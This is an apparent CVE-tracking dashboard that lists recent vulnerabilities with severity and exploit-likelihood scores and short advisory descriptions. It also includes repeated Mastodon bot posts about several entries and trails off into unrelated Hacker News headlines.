## Updated at UTC 2026-01-28T03:03:16.413615

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-24841 9.9 0.00% 2 0 2026-01-28T01:16:14.797000 Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior
CVE-2026-24840 8.0 0.00% 2 0 2026-01-28T01:16:14.647000 Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior
CVE-2026-24838 9.1 0.00% 4 0 2026-01-28T01:16:14.350000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-21569 7.9 0.00% 4 0 2026-01-28T01:16:14.187000 This High severity XXE (XML External Entity Injection) vulnerability was introdu
CVE-2025-15467 None 0.00% 14 0 2026-01-28T00:32:44 Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE
CVE-2026-24837 7.6 0.00% 2 0 2026-01-28T00:15:51.050000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-24836 7.6 0.00% 2 0 2026-01-28T00:15:50.910000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-24833 7.6 0.00% 2 0 2026-01-28T00:15:50.773000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-23830 10.0 0.00% 2 0 2026-01-28T00:15:50.170000 SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sa
CVE-2025-67645 8.8 0.00% 2 0 2026-01-28T00:15:49.770000 OpenEMR is a free and open source electronic health records and medical practice
CVE-2025-55292 8.2 0.00% 2 0 2026-01-28T00:15:49.607000 Meshtastic is an open source mesh networking solution. In the current Meshtastic
CVE-2026-24858 9.8 0.00% 7 0 2026-01-27T22:15:58.067000 An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-2
CVE-2026-24778 8.8 0.00% 2 0 2026-01-27T22:15:57.097000 Ghost is an open source content management system. In Ghost versions 5.43.0 thro
CVE-2026-24765 7.8 0.00% 4 0 2026-01-27T22:15:56.790000 PHPUnit is a testing framework for PHP. A vulnerability has been discovered in v
CVE-2025-59106 8.8 0.01% 2 0 2026-01-27T21:32:51 The binary serving the web server and executing basically all actions launched f
CVE-2025-21589 9.8 0.00% 4 0 2026-01-27T21:31:56 An Authentication Bypass Using an Alternate Path or Channel vulnerability in Jun
CVE-2026-24881 8.1 0.00% 2 0 2026-01-27T21:31:49 In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an
CVE-2026-24747 8.8 0.00% 2 0 2026-01-27T20:10:54 ### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an att
CVE-2026-24882 8.4 0.00% 2 0 2026-01-27T19:16:16.670000 In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon durin
CVE-2026-23760 9.8 51.37% 3 1 template 2026-01-27T18:33:14 SmarterTools SmarterMail versions prior to build 9511 contain an authentication
CVE-2025-33234 7.8 0.00% 4 0 2026-01-27T18:32:29 NVIDIA runx contains a vulnerability where an attacker could cause a code inject
CVE-2026-23593 7.5 0.00% 2 0 2026-01-27T18:32:29 A vulnerability in the web-based management interface of HPE Aruba Networking Fa
CVE-2026-24874 9.1 0.00% 4 0 2026-01-27T18:32:28 Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in t
CVE-2026-24873 7.8 0.00% 2 0 2026-01-27T18:32:28 Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects l
CVE-2026-24832 9.8 0.00% 2 0 2026-01-27T18:32:25 Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affec
CVE-2026-24831 7.5 0.00% 4 0 2026-01-27T18:32:16 Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-te
CVE-2026-22260 7.5 0.00% 2 0 2026-01-27T18:15:55.383000 Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and pri
CVE-2026-23881 7.7 0.00% 2 0 2026-01-27T18:02:23 ## Summary Unbounded memory consumption in Kyverno's policy engine allows users
CVE-2026-24869 8.1 0.00% 2 0 2026-01-27T17:16:14.470000 Use-after-free in the Layout: Scrolling and Overflow component. This vulnerabili
CVE-2026-22039 9.9 0.00% 2 0 2026-01-27T17:16:12.097000 Kyverno is a policy engine designed for cloud native platform engineering teams.
CVE-2026-21509 7.8 13.01% 15 2 2026-01-27T16:19:42.330000 Reliance on untrusted inputs in a security decision in Microsoft Office allows a
CVE-2026-24875 7.8 0.00% 2 0 2026-01-27T16:16:37.013000 Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affect
CVE-2026-24872 9.8 0.00% 2 0 2026-01-27T16:16:36.640000 improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This i
CVE-2025-68670 9.1 0.00% 2 0 2026-01-27T16:16:16.037000 xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticat
CVE-2026-1470 10.0 0.00% 1 1 2026-01-27T15:30:38 n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflo
CVE-2026-21720 7.5 0.04% 1 1 2026-01-27T15:30:30 Every uncached /avatar/:hash request spawns a goroutine that refreshes the Grava
CVE-2025-52691 10.0 79.25% 3 1 template 2026-01-27T15:28:07.247000 Successful exploitation of the vulnerability could allow an unauthenticated atta
CVE-2025-41727 7.8 0.02% 1 0 2026-01-27T14:59:34.073000 A local low privileged attacker can bypass the authentication of the Device Mana
CVE-2026-24828 7.5 0.04% 1 0 2026-01-27T14:59:34.073000 Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is
CVE-2026-24830 9.8 0.04% 1 1 2026-01-27T14:59:34.073000 Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects
CVE-2026-21721 8.1 0.03% 1 1 2026-01-27T14:59:34.073000 The dashboard permissions API does not verify the target dashboard scope and onl
CVE-2026-24470 8.1 0.02% 1 1 2026-01-27T14:59:34.073000 Skipper is an HTTP router and reverse proxy for service composition. Prior to ve
CVE-2025-14459 8.5 0.01% 1 1 2026-01-27T14:59:34.073000 A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerabili
CVE-2025-41726 8.8 0.18% 1 0 2026-01-27T12:31:24 A low privileged remote attacker can execute arbitrary code by sending specially
CVE-2026-24827 7.5 0.04% 1 1 2026-01-27T12:31:24 Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affec
CVE-2025-13601 7.7 0.03% 1 0 2026-01-27T10:15:48.420000 A heap-based buffer overflow problem was found in glib through an incorrect calc
CVE-2026-1361 7.8 0.01% 1 1 2026-01-27T06:30:18 ASDA-Soft Stack-based Buffer Overflow Vulnerability
CVE-2026-24523 7.5 0.03% 2 1 2026-01-27T00:32:17 Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne
CVE-2026-24536 7.5 0.03% 1 0 2026-01-27T00:31:13 Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne
CVE-2026-24531 9.8 0.11% 1 1 2026-01-27T00:31:13 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-24656 3.7 0.03% 1 0 2026-01-26T23:43:30 Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The D
CVE-2025-27821 7.3 0.04% 1 0 2026-01-26T23:40:20 Out-of-bounds Write vulnerability in Apache Hadoop HDFS native client. This iss
CVE-2026-24490 8.1 0.01% 1 1 2026-01-26T23:36:20 ### Summary A Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android
CVE-2026-24486 8.6 0.02% 2 1 2026-01-26T23:28:06 ### Summary A Path Traversal vulnerability exists when using non-default config
CVE-2026-24534 8.8 0.04% 1 1 2026-01-26T23:16:10.440000 Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manage
CVE-2026-24532 8.8 0.04% 1 1 2026-01-26T23:16:10.283000 Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allow
CVE-2026-24524 8.1 0.03% 2 0 2026-01-26T23:16:09.643000 Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploi
CVE-2026-22582 9.8 0.02% 2 1 2026-01-26T21:31:38 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection
CVE-2026-22585 9.8 0.01% 2 0 2026-01-26T21:31:38 Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Mar
CVE-2026-24538 7.6 0.11% 2 1 2026-01-26T21:30:35 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-24061 9.8 34.45% 13 38 template 2026-01-26T21:30:32 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2018-14634 7.8 18.00% 3 1 2026-01-26T21:30:29 An integer overflow flaw was found in the Linux kernel's create_elf_tables() fun
CVE-2026-21962 10.0 0.04% 2 1 2026-01-26T21:15:56.233000 Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in pr
CVE-2026-22586 9.8 0.01% 2 0 2026-01-26T19:16:23.930000 Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagem
CVE-2026-22709 9.8 0.06% 5 0 2026-01-26T18:57:15 In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` ca
CVE-2026-22696 None 0.02% 1 1 2026-01-26T18:55:14 ## Impact This vulnerability involves a critical gap in the cryptographic verifi
CVE-2026-22583 9.8 0.02% 1 0 2026-01-26T18:32:34 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection
CVE-2025-52024 9.4 0.03% 1 0 2026-01-26T18:32:32 A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-
CVE-2025-13952 9.8 0.01% 1 0 2026-01-26T18:32:32 A web page that contains unusual GPU shader code is loaded from the Internet int
CVE-2025-70982 10.0 0.04% 1 0 2026-01-26T18:31:31 Incorrect access control in the importUser function of SpringBlade v4.5.0 allows
CVE-2025-67274 7.5 0.04% 1 0 2026-01-26T18:31:31 An issue in continuous.software aangine v.2025.2 allows a remote attacker to obt
CVE-2025-52026 7.5 0.01% 1 0 2026-01-26T17:16:11.030000 An information disclosure vulnerability exists in the /srvs/membersrv/getCashier
CVE-2025-52025 9.4 0.01% 1 0 2026-01-26T17:16:10.867000 An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint o
CVE-2025-67264 7.8 0.05% 1 0 2026-01-26T16:15:59.017000 An OS command injection vulnerability in the com.sprd.engineermode component in
CVE-2026-1283 7.8 0.01% 1 0 2026-01-26T15:31:29 A Heap-based Buffer Overflow vulnerability affecting the EPRT file reading proce
CVE-2025-67968 0 0.02% 1 0 2026-01-26T15:04:33.567000 Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes R
CVE-2026-24367 8.8 0.03% 1 0 2026-01-26T15:04:14.850000 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2025-66428 8.8 0.02% 1 0 2026-01-26T15:04:14.850000 An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.
CVE-2026-20736 7.5 0.03% 1 0 2026-01-26T15:04:14.850000 Gitea does not properly verify repository context when deleting attachments. A u
CVE-2026-20897 9.1 0.03% 1 0 2026-01-26T15:04:14.850000 Gitea does not properly validate repository ownership when deleting Git LFS lock
CVE-2026-21264 9.3 0.07% 1 0 2026-01-26T15:04:14.850000 Improper neutralization of input during web page generation ('cross-site scripti
CVE-2026-24609 7.5 0.11% 1 0 2026-01-26T15:03:51.687000 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-69908 7.5 0.01% 1 0 2026-01-26T15:03:51.687000 An unauthenticated information disclosure vulnerability in Newgen OmniApp allows
CVE-2026-0710 8.4 0.05% 1 0 2026-01-26T15:03:51.687000 A flaw was found in SIPp. A remote attacker could exploit this by sending specia
CVE-2025-14866 8.8 0.01% 1 0 2026-01-26T15:03:51.687000 The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escala
CVE-2025-4320 10.0 0.07% 1 0 2026-01-26T15:03:51.687000 Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for
CVE-2025-15063 9.8 1.00% 1 0 2026-01-26T15:03:51.687000 Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerabilit
CVE-2025-15062 7.8 0.05% 1 0 2026-01-26T15:03:51.687000 Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerabi
CVE-2026-0762 8.1 0.36% 1 0 2026-01-26T15:03:51.687000 GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution
CVE-2026-1284 7.8 0.01% 1 0 2026-01-26T15:03:33.357000 An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure i
CVE-2025-13374 9.8 0.14% 1 1 2026-01-26T15:03:33.357000 The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads
CVE-2026-1257 7.5 0.07% 1 0 2026-01-26T15:03:33.357000 The Administrative Shortcodes plugin for WordPress is vulnerable to Local File I
CVE-2026-24412 8.8 0.06% 1 0 2026-01-26T15:03:33.357000 iccDEV provides libraries and tools for interacting with, manipulating, and appl
CVE-2026-1386 6.0 0.01% 1 0 2026-01-26T15:03:33.357000 A UNIX symbolic link following issue in the jailer component in Firecracker vers
CVE-2025-70986 7.5 0.01% 1 0 2026-01-26T15:03:33.357000 Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unaut
CVE-2026-1428 8.8 0.29% 1 0 2026-01-26T09:30:24 Single Sign-On Portal System developed by WellChoose has a OS Command Injection
CVE-2026-1427 8.8 0.09% 1 0 2026-01-26T09:30:24 Single Sign-On Portal System developed by WellChoose has a OS Command Injection
CVE-2026-1420 8.8 0.09% 1 0 2026-01-26T06:30:34 A flaw has been found in Tenda AC23 16.03.07.52. This impacts an unknown functio
CVE-2026-0911 7.5 0.07% 1 0 2026-01-24T15:30:21 The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPre
CVE-2025-69180 8.8 0.03% 1 0 2026-01-23T22:36:54 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-24608 7.5 0.11% 1 0 2026-01-23T22:36:54 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-24635 7.5 0.11% 1 0 2026-01-23T22:36:54 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2025-69907 7.5 0.03% 1 0 2026-01-23T22:35:52 An unauthenticated information disclosure vulnerability exists in Newgen OmniDoc
CVE-2025-56005 9.8 0.36% 1 1 2026-01-23T22:35:51 An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 all
CVE-2025-66720 7.5 0.01% 1 0 2026-01-23T21:31:51 Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/amp
CVE-2025-67229 9.8 0.01% 1 0 2026-01-23T21:31:51 An improper certificate validation vulnerability exists in ToDesktop Builder v0.
CVE-2025-66719 9.1 0.03% 1 0 2026-01-23T21:31:50 An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation log
CVE-2024-37079 9.8 79.02% 7 0 2026-01-23T21:31:35 vCenter Server contains a heap-overflow vulnerability in the implementation of t
CVE-2025-70983 10.0 0.01% 1 0 2026-01-23T21:30:54 Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows
CVE-2025-70985 9.1 0.01% 1 0 2026-01-23T21:30:44 Incorrect access control in the update function of RuoYi v4.8.2 allows unauthori
CVE-2025-56590 9.8 0.05% 1 0 2026-01-23T21:30:43 An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF S
CVE-2026-24572 8.8 0.01% 1 0 2026-01-23T21:30:43 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2025-34026 7.5 47.46% 1 0 template 2026-01-23T21:30:35 The Versa Concerto SD-WAN orchestration platform is vulnerable to an authenticat
CVE-2026-20912 None 0.03% 1 0 2026-01-23T20:14:54 Gitea does not properly validate repository ownership when linking attachments t
CVE-2026-20750 None 0.03% 1 0 2026-01-23T20:14:36 Gitea does not properly validate project ownership in organization project opera
CVE-2025-11344 6.3 0.19% 1 0 2026-01-23T19:15:51.993000 A vulnerability was detected in ILIAS up to 8.23/9.13/10.1. Affected by this vul
CVE-2025-68645 8.8 26.23% 1 3 template 2026-01-23T18:39:33.290000 A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Z
CVE-2026-24423 None 0.09% 2 0 2026-01-23T18:31:37 SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated
CVE-2024-9932 9.8 81.47% 2 3 2026-01-23T18:31:22 The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads
CVE-2025-4319 9.4 0.07% 1 0 2026-01-23T15:31:44 Improper Restriction of Excessive Authentication Attempts, Weak Password Recover
CVE-2025-15351 7.8 0.21% 1 0 2026-01-23T06:31:32 Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Cod
CVE-2025-15349 7.5 0.09% 1 0 2026-01-23T06:31:32 Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This
CVE-2025-15059 7.8 0.06% 1 0 2026-01-23T06:31:26 GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi
CVE-2025-15061 9.8 0.85% 1 0 2026-01-23T06:31:24 Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Executio
CVE-2025-15350 7.8 0.21% 1 0 2026-01-23T06:31:24 Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Cod
CVE-2025-15348 7.8 0.21% 1 0 2026-01-23T06:31:23 Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code
CVE-2026-1201 None 0.04% 1 0 2026-01-23T00:31:24 An Authorization Bypass Through User-Controlled Key vulnerability in Hubitat Ele
CVE-2026-24305 9.3 0.07% 1 0 2026-01-23T00:31:24 Azure Entra ID Elevation of Privilege Vulnerability
CVE-2026-24306 9.8 0.09% 1 1 2026-01-23T00:31:24 Improper access control in Azure Front Door (AFD) allows an unauthorized attacke
CVE-2025-54816 9.4 0.07% 1 0 2026-01-23T00:31:17 This vulnerability occurs when a WebSocket endpoint does not enforce proper aut
CVE-2026-20613 None 0.01% 1 0 2026-01-22T22:30:06 ### Summary The `ArchiveReader.extractContents()` function used by `cctl image l
CVE-2025-54313 7.5 4.17% 1 3 2026-01-22T21:52:57 eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, and 10.1.7 has embedded malicious
CVE-2025-31125 5.3 65.97% 1 7 template 2026-01-22T21:47:41 ### Summary The contents of arbitrary files can be returned to the browser. ##
CVE-2026-0920 9.8 0.03% 1 2 2026-01-22T09:31:48 The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Ad
CVE-2026-22755 None 0.96% 1 0 2026-01-20T21:31:34 Improper Neutralization of Special Elements used in a Command ('Command Injectio
CVE-2026-20965 7.6 0.03% 1 0 2026-01-13T18:31:18 Improper verification of cryptographic signature in Windows Admin Center allows
CVE-2025-55182 10.0 57.94% 1 100 template 2025-12-09T16:53:25 ### Impact There is an unauthenticated remote code execution vulnerability in R
CVE-2025-12480 9.1 75.25% 1 0 template 2025-11-14T02:00:02.350000 Triofox versions prior to 16.7.10368.56560, are vulnerable to an Improper Access
CVE-2025-12556 8.8 0.11% 2 0 2025-11-06T18:32:50 An argument injection vulnerability exists in the affected product that could al
CVE-2025-41244 7.8 0.92% 1 3 2025-11-06T13:58:13.620000 VMware Aria Operations and VMware Tools contain a local privilege escalation vul
CVE-2023-26819 2.9 0.04% 1 0 2025-11-03T20:16:00.937000 cJSON 1.7.15 might allow a denial of service via a crafted JSON document such as
CVE-2025-34164 None 0.30% 2 1 2025-11-03T18:32:42 A heap-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions p
CVE-2025-8088 8.8 2.94% 7 27 2025-10-22T00:34:26 A path traversal vulnerability affecting the Windows version of WinRAR allows th
CVE-2021-35394 9.8 94.22% 1 0 template 2025-10-22T00:33:23 Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called
CVE-2019-17621 9.8 93.30% 1 2 2025-10-22T00:31:50 The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06
CVE-2025-34165 None 0.25% 2 1 2025-08-30T00:30:35 A stack-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions
CVE-2024-37081 7.8 49.73% 1 4 2025-06-20T19:08:08.187000 The vCenter Server contains multiple local privilege escalation vulnerabilities
CVE-2007-0882 None 90.96% 1 0 2025-04-09T03:38:26 Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10
CVE-2025-2294 9.8 54.35% 2 9 template 2025-03-28T06:30:37 The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclu
CVE-2024-37080 9.8 36.73% 1 0 2025-03-13T15:33:36 vCenter Server contains a heap-overflow vulnerability in the implementation of t
CVE-2020-15250 4.4 0.02% 1 0 2024-11-21T05:05:11.403000 In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder cont
CVE-2026-24770 0 0.00% 2 0 N/A
CVE-2026-24741 0 0.00% 2 0 N/A
CVE-2026-24783 0 0.00% 2 0 N/A
CVE-2026-24736 0 0.00% 4 0 N/A
CVE-2026-22794 0 0.03% 2 1 N/A
CVE-2026-22259 0 0.00% 2 0 N/A
CVE-2026-22258 0 0.00% 2 0 N/A
CVE-2026-0648 0 0.00% 2 0 N/A
CVE-2026-24002 0 0.05% 2 0 N/A
CVE-2026-23864 0 0.60% 2 1 N/A
CVE-2025-48384 0 0.33% 2 44 N/A
CVE-2026-24469 0 0.03% 1 0 N/A
CVE-2026-24399 0 0.01% 2 0 N/A
CVE-2026-24406 0 0.06% 2 0 N/A
CVE-2026-24405 0 0.06% 1 0 N/A

CVE-2026-24841
(9.9 CRITICAL)

EPSS: 0.00%

updated 2026-01-28T01:16:14.797000

2 posts

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameters are directly interpolated into shell commands without sanitization, allowing authenticated attackers to execute arbitrary commands on the host server.

thehackerwire@mastodon.social at 2026-01-28T02:02:40.000Z ##

πŸ”΄ CVE-2026-24841 - Critical (9.9)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:02:40.000Z ##

πŸ”΄ CVE-2026-24841 - Critical (9.9)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24840
(8.0 HIGH)

EPSS: 0.00%

updated 2026-01-28T01:16:14.647000

2 posts

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at https://dokploy.com/install.sh, line 154) uses a hardcoded password when creating the database container. This means that nearly all Dokploy installations use the same database credentials and could be compromised. Version 0.26.6 contain

thehackerwire@mastodon.social at 2026-01-28T02:01:18.000Z ##

🟠 CVE-2026-24840 - High (8)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:01:18.000Z ##

🟠 CVE-2026-24840 - High (8)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24838
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-01-28T01:16:14.350000

4 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T02:01:08.000Z ##

πŸ”΄ CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:30.000Z ##

πŸ”΄ CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:01:08.000Z ##

πŸ”΄ CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:30.000Z ##

πŸ”΄ CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21569
(7.9 HIGH)

EPSS: 0.00%

updated 2026-01-28T01:16:14.187000

4 posts

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server. This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated attacker to access local and remote content which has high impact to confidentiality, low impact to integrity, high impact to availability, and requires no

thehackerwire@mastodon.social at 2026-01-28T02:00:58.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:20.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:58.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:20.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15467(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-01-28T00:32:44

14 posts

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 para

hackernewsdaily@bsd.cafe at 2026-01-27T20:00:08.000Z ##

πŸ“° Today's Top 21 Hacker News Stories (Sorted by Score) πŸ“°
----------------------------------------
πŸ”– Title: TikTok users can't upload anti-ICE videos. The company blames tech issues
πŸ”— URL: cnn.com/2026/01/26/tech/tiktok
πŸ‘ Score: [983]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Heathrow scraps liquid container limit
πŸ”— URL: bbc.com/news/articles/c1evvx89
πŸ‘ Score: [576]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: Cloudflare claimed they implemented Matrix on Cloudflare workers. They didn't
πŸ”— URL: tech.lgbt/@JadedBlueEyes/11596
πŸ‘ Score: [392]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: I made my own Git
πŸ”— URL: tonystr.net/blog/git_immitation
πŸ‘ Score: [287]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
----------------------------------------
πŸ”– Title: U.S. government has lost more than 10k STEM PhDs since Trump took office
πŸ”— URL: science.org/content/article/u-
πŸ‘ Score: [279]
πŸ’¬ Discussion: news.ycombinator.com/item?id=4
